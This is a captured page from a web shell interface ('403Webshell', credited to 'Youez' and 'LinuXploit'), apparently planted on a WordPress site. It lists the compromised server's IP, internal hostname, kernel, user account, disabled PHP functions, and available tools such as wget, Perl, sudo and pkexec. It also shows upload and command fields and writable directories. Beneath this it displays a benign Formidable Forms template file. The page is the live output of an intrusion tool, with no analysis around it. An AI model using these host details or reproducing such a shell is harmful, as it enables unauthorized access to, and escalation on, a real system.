403Webshell
Server IP : 54.216.143.184  /  Your IP : 172.31.14.113
Web Server : Apache/2.4.68 (Ubuntu) mod_fcgid/2.3.9 OpenSSL/3.0.2
System : Linux ip-172-31-10-208.eu-west-1.compute.internal 6.8.0-1044-aws #46~22.04.1-Ubuntu SMP Tue Dec 2 12:52:18 UTC 2025 x86_64
User : kazang ( 1006)
PHP Version : 8.2.31
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,system,passthru,shell_exec,proc_open,popen
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/kazang/web/kazang.com/public_html/wp-content/plugins/formidable/classes/views/inbox/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/kazang/web/kazang.com/public_html/wp-content/plugins/formidable/classes/views/inbox/list.php
<?php
if ( ! defined( 'ABSPATH' ) ) {
	die( 'You are not allowed to call this page directly.' );
}
?>
<div class="frm-inbox-wrapper">
	<div class="frm-tabs-navs">
		<ul class="frm-flex-box">
			<li class="frm-active">
				<?php
				esc_html_e( 'Inbox', 'formidable' );
				echo wp_kses_post( FrmInboxController::get_notice_count( false ) );
				?>
			</li>
			<li><?php esc_html_e( 'Dismissed', 'formidable' ); ?></li>
		</ul>
	</div>
	<div class="frm-tabs-delimiter">
		<span class="frm-tabs-active-underline"></span>
	</div>
	<div class="frm-tabs-container">
		<div class="frm-tabs-slide-track frm-flex-box">
			<?php foreach ( $template as $key => $template_item ) : ?>
				<?php if ( in_array( $key, array( 'unread', 'dismissed' ), true ) ) : ?>
					<?php $tab_classname = 'dismissed' === $key ? 'frm-dismissed-inbox-messages' : ''; ?>

					<div class="frm-scrollbar-wrapper <?php echo 'unread' === $key ? 'frm-active' : ''; ?>">
						<div class="<?php echo esc_attr( $tab_classname ); ?>">
							<?php if ( 'unread' === $key ) : ?>
								<div id="frm_empty_inbox" class="<?php echo esc_attr( $subscribe_inbox_classnames ); ?>">
									<?php
										FrmAppController::api_email_form(
											'subscribe',
											__( 'You don\'t have any new messages', 'formidable' ),
											__( 'Get the details about new updates, tips, sales, and more. We\'ll keep you in the loop.', 'formidable' )
										);
									?>
									<button id="frm-add-my-email-address" class="button-primary frm-button-primary"><?php esc_html_e( 'Subscribe', 'formidable' ); ?></button>
								</div>
							<?php endif; ?>

							<?php foreach ( $template_item as $tab_key => $message ) : ?>
								<div class="frm-inbox-message-container frm-flex-col" data-message="<?php echo esc_attr( $tab_key ); ?>" >
									<div class="frm-inbox-message-heading frm-flex-box frm-justify-between">
										<div class="frm-flex-col">
											<span>
												<?php
												printf(
													/* translators: %s: Time stamp */
													esc_html__( '%s ago', 'formidable' ),
													esc_html( FrmAppHelper::human_time_diff( $message['created'] ) )
												);
												?>
											</span>
											<h3><?php echo esc_html( $message['subject'] ); ?></h3>
										</div>
										<?php if ( 'unread' === $key ) : ?>
											<a href="#" class="frm_inbox_dismiss"><?php esc_html_e( 'Dismiss', 'formidable' ); ?></a>
										<?php endif; ?>
									</div>
									<p><?php echo wp_kses_post( $message['message'] ); ?></p>
									<?php echo wp_kses( $message['cta'], array( 'a' => array( 'href' => true ) ) ); ?>
								</div>
							<?php endforeach; ?>

						</div>
					</div>
				<?php endif; ?>
			<?php endforeach; ?>
		</div>
	</div>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit